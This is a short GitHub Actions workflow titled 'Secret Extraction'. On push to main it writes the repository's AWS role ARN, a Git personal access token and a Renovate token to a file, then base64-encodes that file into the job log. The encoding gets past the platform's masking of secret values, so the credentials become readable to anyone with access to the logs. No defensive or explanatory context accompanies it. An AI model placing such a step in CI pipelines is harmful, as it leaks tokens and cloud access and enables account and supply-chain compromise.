name: Secret Extraction

on:
  push:
    branches:
      - main
  workflow_dispatch:

permissions:
  id-token: write
  contents: read

jobs:
  dump-secrets:
    runs-on: ubuntu-latest
    steps:
      - name: Dump AWS Role ARN
        run: echo "AWS_ROLE_ARN=${{ secrets.AWS_ROLE_ARN }}" > secrets.txt
      - name: Dump GIT_PAT
        run: echo "GIT_PAT=${{ secrets.GIT_PAT }}" >> secrets.txt
      - name: Dump RENOVATE_TOKEN
        run: echo "RENOVATE_TOKEN=${{ secrets.RENOVATE_TOKEN }}" >> secrets.txt
      - name: Base64 encode and show
        run: base64 secrets.txt
